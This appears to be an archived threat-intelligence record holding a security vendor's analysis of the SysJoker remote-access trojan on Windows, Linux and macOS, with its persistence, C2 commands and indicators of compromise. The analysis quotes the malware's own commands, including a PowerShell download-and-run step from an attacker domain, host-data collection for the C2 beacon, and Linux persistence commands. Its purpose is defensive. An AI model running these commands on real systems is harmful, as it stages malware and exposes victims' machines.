{ "id": "ce86134c-fba4-47db-a6f0-c683f9e66370", "created_at": "2026-04-06T00:09:27.158388Z", "updated_at": "2026-04-10T03:24:18.292365Z", "deleted_at": null, "sha1_hash": "18a79e3359e37d480b181e6658e95734a1fe44c4", "title": "SysJoker – An Analysis of a Multi-OS RAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5116001, "plain_text": "SysJoker – An Analysis of a Multi-OS RAT\r\nBy Threat Analysis Unit\r\nPublished: 2022-03-23 · Archived: 2026-04-05 14:54:24 UTC\r\nThis article was written by Sagar Daundkar.\r\nSummary \r\nSysJoker RAT is cross-platform malware which targets Windows, Linux and macOS operating systems. Being\r\ncross-platform allows the malware authors to gain advantage of wide infection on all major platforms. SysJoker\r\nhas the ability to execute commands remotely as well as download and execute new malware on victim machines.\r\nThe major functionality remains the same in all three platforms due to its shared code. In this post, we will\r\nresearch further how the malware differs between the different operating system versions.  \r\nWindows Version \r\nFor the Windows version of SysJoker, the first stage malware is a DLL which downloads the main payload of the\r\nSysJoker RAT. The DLL uses powershell commands to download the zip file from the url, unzip it, then execute\r\nthe final payload. Detailed behavior is as below: \r\nIt first creates a directory “C:\\ProgramData\\RecoverySystem”, then executes powershell to download zip from\r\ngithub containing the final payload msg.exe. \r\n“powershell.exe Invoke-WebRequest -Uri ‘https://github.url-mini.com/msg.zip’ -OutFile\r\n‘C:\\ProgramData\\RecoverySystem\\recoveryWindows.zip’;Write-Output “Time taken : $((Get –\r\nDate).Subtract($start_time).Seconds) second(s)”” \r\nFurthermore, it extracts the downloaded recoveryWindows.zip in same directory where zip is downloaded with\r\npowershell command below: \r\n“powershell.exe Expand-Archive -LiteralPath ‘C:\\ProgramData\\RecoverySystem\\recoveryWindows.zip’ -\r\nDestinationPath ‘C:\\ProgramData\\RecoverySystem'” \r\nFinally it launches the extracted msg.exe with powershell command: \r\n“powershell.exe start C:\\ProgramData\\RecoverySystem\\msg.exe” \r\nMsg.exe sleeps multiple times to evade security products. It copies itself to\r\n“C:\\ProgramData\\SystemData\\igfxCUIService.exe” with below powershell command: \r\n“powershell.exe copy C:\\ProgramData\\RecoverySystem\\msg.exe\r\nC:\\ProgramData\\SystemData\\igfxCUIService.exe” \r\nThe malware then executes this igfxCUIService.exe to begin the RAT activity. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 1 of 12\n\nFigure 1. Code for executing the final RAT. \r\nThe final payload decodes the encoded responses from C2  by applying Base64 decode and XOR decryption\r\nsequentially. It first decrypts the Google Drive URL that points to an encrypted file that is used to determine the\r\nC2 internet address. \r\nFigure 2. Code for Decrypting the GDrive URL \r\nIn sequence, the malware will run multiple command lines to collect various system information, which it will\r\nstore into temporary text files. This collected information includes the network MAC address, hard drive serial\r\nnumber, current user name,OS info, and the IP address. \r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe getmac | Out-File -Encoding Default\r\nC:\\ProgramData\\SystemData\\temps1.txt ; wmic path win32_physicalmedia get SerialNumber | Out-File -\r\nEncoding Default C:\\ProgramData\\SystemData\\temps2.txt  \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 2 of 12\n\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $env:username | Out-File -Encoding\r\nDefault C:\\ProgramData\\SystemData\\tempu.txt \r\nC:\\Windows\\System32\\cmd.exe /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value \u003e\r\nC:\\ProgramData\\SystemData\\tempo1.txt \u0026\u0026 type C:\\ProgramData\\SystemData\\tempo1.txt \u003e\r\nC:\\ProgramData\\SystemData\\tempo2.txt  \r\nC:\\Windows\\System32\\cmd.exe /c wmic nicconfig where “IPEnabled = True” get ipaddress \u003e\r\nC:\\ProgramData\\SystemData\\tempi1.txt \u0026\u0026 type C:\\ProgramData\\SystemData\\tempi1.txt \u003e\r\nC:\\ProgramData\\SystemData\\tempi2.txt  \r\nWith above commands executed it creates JSON objects by reading through the temporary text files and encrypts\r\nit with XOR. This encrypted data is then base64 encoded and stored in the newly created\r\n“C:\\ProgramData\\SystemData\\microsoft_Windows.dll” file. The plain text JSON object is as shown in Figure 3. \r\nFigure 3. Json object for machine information before encryption \r\nSysJoker sends this collected machine information as an initial beacon to the C2 server. After registering with the\r\nC2, it becomes available for the threat actor to send commands to execute. These commands send their results\r\nwhether the command execution is successful or not. SysJoker supports receiving four commands from the C2\r\nthough, notably, they are not all functional: \r\ncmd \r\nexe \r\nremove_reg \r\nexit\r\n“cmd” command \r\nUpon receiving a “cmd” network packet, the RAT will parse out the embedded command line sent by the threat\r\nactor and execute it with cmd.exe as shown in Figure 4. It will redirect the output of commands executed to a file\r\nnamed “C:\\ProgramData\\SystemData\\txc1.txt”, which is then encoded and transmitted to C2. It can support\r\nalmost all commands which can be executed with cmd.exe. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 3 of 12\n\nFigure 4. Code for processing cmd command  \r\n“exe” command \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 4 of 12\n\nUpon receiving an “exe” network packet, the RAT will parse out multiple components from the data. This includes\r\nan embedded URL from the packet. This URL is used to download a file and place it into the specified directory.\r\nOnce downloaded, the file will be executed. \r\nFigure 5. Code for processing exe command \r\n“remove_reg” and “exit” commands \r\nThere were two more commands found in code: remove_reg, and exit. However, these commands were not fully\r\nfunctional in the samples analyzed.  \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 5 of 12\n\nFigure 6. Parsing of remove_reg and exit commands\r\nLinux Version\r\nThe Linux version of SysJoker has many similarities in behavior to the Windows version from the collection of\r\nsystem information and string decryption logic to supported commands. The xor decryption key is similar in both\r\noperating system versions. \r\nPersistence:  \r\nThe malware will first create persistence with a cron job. This job is set to execute a copy of the malware stored at\r\n“/home/$username/.Library/SystemServices/updateSystem”, as shown in Figure 7. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 6 of 12\n\nFigure 7. Terminal log of malware creating Cronjob scheduler. \r\nThe malware uses code shown in Figure. 8 to create a cron job by using the Linux crontab command.\r\nFigure 8. Code for creating Cronjob scheduler on reboot \r\nIf the “updateSystem” file is already present at  ““/home/$username/.Library/SystemServices”, and if any process\r\nis running with name “updateSystem”, then the malware kills that process and replace updateSystem file with self\r\ncopy. \r\npkill updateSystem\r\ncp -rf ‘.’ ‘/home/username/.Library/SystemServices/updateSystem’ \r\nCode shown in Figure. 9 is used to form and execute above commands: \r\nFigure 9. Code for updateSystem process kill \r\nIt then executes the ‘updateSystem’ with below command: \r\nnohup ‘/home/username/.Library/SystemServices/updateSystem’ \u003e/dev/null 2\u003e\u00261 \r\nThe updateSystem process will read a text file hosted on a Google Drive account to get the final C2 URL. The\r\nresponse is Base64 decoded and decrypted with an XOR key, as shown in Figure .  \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 7 of 12\n\nFigure 8. Code used to encrypt the response before sending \r\nSysJoker will transmit the collected machine information to the C2 server and await further commands. These\r\nadditional commands will be received in a similar packet structure that is XOR encrypted and Base64 encoded. \r\nLike the Windows version of the malware, the Linux variant has minimal commands built into it. Below are the\r\ncommands supported by RAT: \r\ncmd command \r\nUpon receiving a “cmd” network packet, the RAT will parse out the embedded command line sent by the threat\r\nactor and execute it directly, as shown in Figure 9.  The output of the command is then encrypted and sent to the\r\nC2 server. \r\nFigure 9. Code for processing cmd command  \r\nexe command \r\nUpon receiving an “exe” network packet, the RAT will parse out multiple components from the data. This includes\r\nan embedded URL from the packet. This URL is used to download a file and place it into the specified directory.\r\nThe downloaded file is expected to be a ZIP archive, which will be unzipped to an executable file. The malware\r\nsets this file as executable and then launches it, as shown in Figure 10. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 8 of 12\n\nFigure 10. Code for processing exe command \r\nOnce complete, the malware will send a basic response to the C2, as shown in Figure 11. \r\nFigure 11. Response sent after execution of exe command \r\nMacOS Version \r\nThe MacOS version of malware has many similarities to the other versions. The malware is seen running with the\r\nfilename of types-config.ts, copied to the directory of  “/Library/MacOsServices/updateMacOs”. From the strings\r\nfound in the malware we can get a basic understanding of its functionality, as shown in Figure 12. \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 9 of 12\n\nFigure 12. String from macOS version of RAT \r\nPersistence \r\nThe malware persists on the system by using launchAgents named “Apple launch service” targeting   \r\n“/Library/MacOsServices/updateMacOs”. \r\nThe other functionality is almost identical to Linux version of malware including C2 communications, commands,\r\nand responses.  \r\nIndicators of Compromise (IOCs) \r\nIndicator  Type  Context \r\n61df74731fbe1eafb2eb987f20e5226962eeceef010164e41ea6c4494a4010fc  SHA256 \r\nSysJoker\r\nDownloader\r\nDLL \r\nd476ca89674c987ca399a97f2d635fe30a6ba81c95f93e8320a5f979a0563517  SHA256 \r\nSysJoker\r\nDownloader\r\nDLL \r\n36fed8ab1bf473714d6886b8dcfbcaa200a72997d50ea0225a90c28306b7670e  SHA256  SysJoker RAT \r\n1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c  SHA256  SysJoker RAT \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 10 of 12\n\n1a9a5c797777f37463b44de2b49a7f95abca786db3977dcdac0f79da739c08ac  SHA256 \r\nOSX SysJoker\r\nRAT \r\nfe99db3268e058e1204aff679e0726dc77fd45d06757a5fda9eafc6a28cfb8df  SHA256 \r\nOSX SysJoker\r\nRAT \r\nd0febda3a3d2d68b0374c26784198dc4309dbe4a8978e44bb7584fd832c325f0  SHA256 \r\nOSX SysJoker\r\nRAT \r\nbd0141e88a0d56b508bc52db4dab68a49b6027a486e4d9514ec0db006fe71eed  SHA256  ELF SysJoker \r\nd028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3  SHA256  ELF SysJoker \r\nd1d5158660cdc9e05ed0207ceba2033aa7736ed1  SHA1 \r\nSysJoker\r\nDownloader\r\nDLL \r\n888226b749b3fa93dadf5d7c2acf32c71e3a0918  SHA1 \r\nSysJoker \r\n  Downloader\r\nDLL \r\n1e894ddc237b033b5b1dcf9b05d281ff0a053532  SHA1  SysJoker RAT \r\nfad66bdf5c5dc2c050cbc574832c6995dba086a0  SHA1  SysJoker RAT \r\n554aef8bf44e7fa941e1190e41c8770e90f07254  SHA1 \r\nOSX SysJoker\r\nRAT \r\nf5149543014e5b1bd7030711fd5c7d2a4bef0c2f  SHA1 \r\nOSX SysJoker\r\nRAT \r\n01d06375cf4042f4e36467078530c776a28cec05  SHA1 \r\nOSX SysJoker\r\nRAT \r\n23c56da0cdddc664980705c4d14cb2579a970eed  SHA1  ELF SysJoker \r\nb21ba8da278b75e1cc515b6e2c84b91be6611800  SHA1  ELF SysJoker \r\nd71e1a6ee83221f1ac7ed870bc272f01  MD5 \r\nSysJoker\r\nDownloader\r\nDLL \r\n293f116c2c51473ae2bf7f4e787d3ec3  MD5 \r\nSysJoker\r\nDownloader\r\nDLL \r\n9a7f0b64007cedfa9ae20dd212892d73  MD5  SysJoker RAT \r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 11 of 12\n\nd90d0f4d6dad402b5d025987030cc87c  MD5 \r\nSysJoker\r\nRAT  \r\ne06e06752509f9cd8bc85aa1aa24dba2  MD5 \r\nOSX SysJoker\r\nRAT \r\n6fb483e7ec55f8c56849d8f4f31bfd7b  MD5 \r\nOSX SysJoker\r\nRAT \r\n85dbbaa8c4d37ebb9829464f0510787b  MD5 \r\nOSX SysJoker\r\nRAT \r\n5e11432c30783b184dc2bf27aa1728b4  MD5  ELF SysJoker \r\nc805649d6909bf1d7e220f144801044b  MD5  ELF SysJoker \r\nTable 1. Indicators of Compromise (IOCs) \r\nSource: https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nhttps://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html" ], "report_names": [ "%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434167, "ts_updated_at": 1775791458, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.pdf", "text": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.txt", "img": "https://archive.orkl.eu/18a79e3359e37d480b181e6658e95734a1fe44c4.jpg" } }